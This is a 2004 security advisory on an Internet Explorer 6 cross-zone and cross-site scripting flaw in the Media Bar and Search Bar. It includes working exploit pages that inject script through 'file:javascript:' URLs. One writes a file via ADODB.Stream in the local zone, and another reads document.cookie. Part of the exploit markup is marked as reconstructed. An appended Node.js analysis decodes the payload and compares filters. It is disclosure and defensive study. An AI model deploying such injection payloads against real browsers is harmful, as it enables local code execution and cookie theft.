#########################################################################
Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability
Release Date  : Mar 3, 2004
Application   : Microsoft Internet Explorer
Tested On     : MS-IE 6.0 (SP1)
Vendor URL    : http://www.microsoft.com/ie
Author        : Cheng Peng Su (apple_soup_at_msn.com)
#########################################################################

[Proof of Concept]

The code below loads a URL into the HTML content area of the Media Bar:

    window.open("http://www.google.com/","_media")

JavaScript can be injected the same way:

    window.open("javascript:alert(location.href)","_media")

On my computer the code above shows a message box reading
'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm', which tells you that
the script executed in the My Computer zone (the Media Bar's own page is a
res:// resource, not a web page).

Script can also be injected into a Media Bar that has already loaded a
website, which gives cross-site scripting against that site.

The Search Bar has the same vulnerability as the Media Bar.

[Exploit]

The document is also available at
http://www.freewebs.com/applesoup/CrossBar/document.txt

The code relies on the 'file:javascript:[script]' vulnerability posted a few
months ago. Microsoft may have noticed that hole: the javascript: protocol
alone no longer works in the code, and script tags are filtered out, so the
script has to be injected through the src attribute of an img tag. Because
the injected markup travels inside a document.write("...") string literal,
double quotes are written as the octal escape \42 ('\\42' in the .htm source
becomes '\42' in the URL, which the string literal then decodes to '"').

I. In Media Bar

1 . Cross Zone Scripting Exploit

---------------------------CrossZone.htm---------------------------
<script>
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' +
        ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' +
        ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
// The img tag below was lost in extraction and is reconstructed from the
// description above (script carried in an img src attribute); any other
// attributes the original tag had are not known.
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_media');
</script>
-------------------------------End---------------------------------

2 . Cross Site Scripting Exploit

---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_media")
setTimeout(function(){
    window.open("file:javascript:alert(document.cookie);","_media")
},5000);
</script>
-------------------------------End---------------------------------

II. In Search Bar

1 . Cross Zone Scripting Exploit

---------------------------CrossZone.htm---------------------------
<script>
// Load a "Friendly HTTP error messages" page for a host that does not
// exist, because that error page lives in the My Computer zone.
window.open("http://wrong_site_add/","_search")
setTimeout(function(){
    // '\\42' -> '\42' -> ' " '
    img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);' +
            ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);' +
            ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
    // img tag reconstructed from the description, as in the Media Bar version.
    inject_html="<img src='" + img_src + "'>";
    window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
</script>
-------------------------------End---------------------------------

2 . Cross Site Scripting Exploit

---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_search")
setTimeout(function(){
    window.open("file:javascript:alert(document.cookie);","_search")
},5000);
</script>
-------------------------------End---------------------------------

[Demo]

Harmless demos:

http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm

[Contact]

Cheng Peng Su
Class 1, Senior 2, high school attached to Wuhan University
Wuhan, Hubei, China (430072)
apple_soup_at_msn.com
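The [Exploit] section's CrossZone.htm depends on one trick that is easy to misread: double quotes are laundered through three layers (the .htm source, the javascript: URL body, and the markup document.write emits) using the octal escape \42, and the script is carried in an img src attribute because script tags are filtered. The block below is an added example, not code from the advisory: it assembles the same URL in Node.js, decodes each layer offline so the resulting markup can be inspected without Internet Explorer, and contrasts a filter that only strips script elements with one that inspects attribute values. It uses only the alert() part of the advisory's payload (the ADODB.Stream file write is left out), assumes the injected tag has the form <img src='...'> (the advisory's own tag was lost in extraction), and the helper names and the script-tag filter are this example's own assumptions.

```javascript
// Added example (not from the advisory). Rebuilds the \42 quote laundering used
// by CrossZone.htm, decodes it layer by layer, and compares two filters.

// Decode the string-literal escapes the javascript: URL body would see.
// Assumed helper: handles the octal (\42) and single-character backslash escapes
// the payload relies on; it is not a full ECMAScript string tokenizer.
function decodeJsStringLiteral(s) {
  return s.replace(/\\([0-7]{1,3})|\\(.)/g, (m, oct, ch) =>
    oct !== undefined ? String.fromCharCode(parseInt(oct, 8)) : ch);
}

// Layer 1: the URL as CrossZone.htm assembles it. '\\42' in this source file is
// backslash-4-2 at runtime, exactly what the .htm page's script produces, so the
// URL itself contains no double quotes other than the two around document.write's
// argument. Only the alert() part of the advisory's payload is used here.
function buildPayloadUrl(fileName) {
  const imgSrc =
    'javascript:file = \\42' + fileName + '\\42; ' +
    'alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
  // Assumed tag form: the advisory says the script is carried in an img tag.
  const injectHtml = "<img src='" + imgSrc + "'>";
  return 'file:javascript:document.write("' + injectHtml + '")';
}

// Layers 2 and 3: what the bar's document ends up evaluating. The javascript:
// body is document.write("...") whose string literal turns \42 into a double
// quote; the emitted <img> tag's src is then itself a javascript: URL.
function decodeLayers(url) {
  const m = /^file:javascript:document\.write\("(.*)"\)$/.exec(url);
  if (!m) throw new Error('URL does not have the expected document.write shape');
  const html = decodeJsStringLiteral(m[1]);
  const img = /<img src='([^']*)'>/.exec(html);
  return { html: html, imgSrc: img ? img[1] : null };
}

// The kind of filter the advisory describes as being in place (assumed
// behaviour): strip <script> elements and nothing else.
function naiveScriptTagFilter(html) {
  return html.replace(/<script\b[\s\S]*?<\/script\s*>/gi, '');
}

// A check on attribute values instead of tag names: any value that begins with
// a script scheme once whitespace and control characters are removed is flagged.
function containsScriptUrl(html) {
  const attr = /=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))/g;
  let m;
  while ((m = attr.exec(html)) !== null) {
    const raw = m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
    const v = raw.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
    if (v.startsWith('javascript:') || v.startsWith('vbscript:')) return true;
  }
  return false;
}

// Walk the layers for the advisory's file name.
const demoUrl = buildPayloadUrl('Exploit.txt');
const demoLayers = decodeLayers(demoUrl);
console.log('raw URL       :', demoUrl);
console.log('written HTML  :', demoLayers.html);
console.log('img src URL   :', demoLayers.imgSrc);
console.log('script-tag filter changes anything:',
  naiveScriptTagFilter(demoLayers.html) !== demoLayers.html);
console.log('attribute check flags it          :', containsScriptUrl(demoLayers.html));
```

The raw URL never contains a quote inside the document.write argument, which is why it survives being passed through window.open as a string; only after the string literal is evaluated does the markup gain its quotes, and only after the img tag is parsed does a second javascript: URL appear. A filter keyed on tag names sees an innocuous img element at every stage; the attribute-value check catches it because it looks at where the script scheme actually lives.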